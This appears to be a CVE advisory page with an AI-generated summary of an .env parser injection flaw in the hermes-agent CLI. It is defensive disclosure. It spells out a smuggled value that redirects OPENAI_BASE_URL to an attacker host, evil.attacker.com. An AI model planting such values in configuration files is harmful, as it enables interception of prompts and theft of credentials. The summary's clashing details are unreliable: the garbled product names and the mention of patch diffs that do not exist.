CVE-2026-10222
Description
A semantic injection flaw in the .env file parser allows remote attacker-controlled values to inject arbitrary Hermes configuration variables, enabling API call interception.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A semantic injection flaw in the .env file parser allows remote attacker-controlled values to inject arbitrary Hermes configuration variables, enabling API call interception.
Vulnerability
A security flaw in NousResearch hermes-agent up to version 2026.4.30 exists in the _sanitize_env_lines function in hermes_cli/config.py. This function performs substring-based splitting of .env file lines using str.find(), without verifying that found key patterns are at the start of a key declaration. As a result, a crafted value containing a known Hermes environment variable name (e.g., OPENAI_BASE_URL) can be treated as a separate key=value pair, enabling injection of arbitrary configuration variables [1].
Exploitation
The attack requires a high complexity and is known to be difficult. The attacker must craft a value (e.g., a fake API key) that embeds a known Hermes key name and a malicious value. This value is then saved through a normal CLI flow (e.g., hermes setup or provider configuration) that calls save_env_value(). Once saved, the parser splits the line, injecting the attacker's configuration into the .env file. The attack can be launched remotely without authentication if the attacker can trick a victim into using the crafted input [1].
Impact
Successful exploitation allows an attacker to persistently inject arbitrary Hermes configuration variables (e.g., OPENAI_BASE_URL) into the victim's .env file. This enables interception of LLM API calls, exfiltration of prompts, and theft of other credentials. The attacker effectively controls where AI model requests are sent, leading to full compromise of the AI pipeline's integrity and confidentiality [1].
Mitigation
As of the public disclosure date (2026-06-01), no official patch or response has been provided by the vendor. Users should avoid using Hermes Gemini or Grand Agent versions up to 2026.4.30 in production until a fix is released. There is no known workaround. The CVE is not listed in CISA KEV. Monitor the vendor's repository for updates [1].
AI Insight generated on Jun 1, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <=2026.04.30
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing boundary check in `_sanitize_env_lines()` — `str.find()` matches known key names as substrings anywhere in a line, allowing an embedded key inside a credential value to be split into a separate environment variable declaration."
Attack vector
An attacker crafts a malicious API key whose value contains a substring like `OPENAI_BASE_URL=http://evil.attacker.com/v1`. When the victim saves this key through any normal Hermes CLI flow (e.g., `hermes setup`), `_sanitize_env_lines()` splits the line on the embedded key name, writing a separate `OPENAI_BASE_URL=http://evil.attacker.com/v1` entry to the `.env` file. On the next startup, `load_env()` reads the injected variable, routing all OpenAI API calls through the attacker's proxy. The attack requires social engineering or a compromised credential source but no special privileges [ref_id=1].
Affected code
The vulnerability resides in `_sanitize_env_lines()` at `hermes_cli/config.py` (lines 3281–3329). The function uses `str.find()` to locate known environment variable names anywhere in a line without verifying that the match occurs at a key boundary, allowing an embedded key name inside a credential value to be treated as a separate declaration. The three call sites that trigger the split are `save_env_value()` (line 3440), `load_env()` (line 3271), and `remove_env_value()` (line 3507) [ref_id=1].
What the fix does
No patch has been published by the vendor. The advisory recommends that `_sanitize_env_lines()` should verify that a matched key name occurs at the start of a key declaration (i.e., preceded by a newline or the beginning of the string) rather than inside a value. Until a fix is applied, users should manually inspect `.env` files for injected variables and avoid saving credentials from untrusted sources [ref_id=1].
Preconditions
- inputVictim must save an attacker-supplied credential through the normal Hermes CLI workflow (e.g., `hermes setup` or provider configuration).
- inputAttacker must craft a credential value that embeds a known Hermes environment variable name (e.g., `OPENAI_BASE_URL`) followed by `=attacker_url`.
- configNo special configuration or elevated privileges are required; the vulnerable parser is always active.
Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
1- Hermes Agent: Five Injection Flaws Disclosed, Two High-Severity with Public ExploitsVypr Intelligence · Jun 1, 2026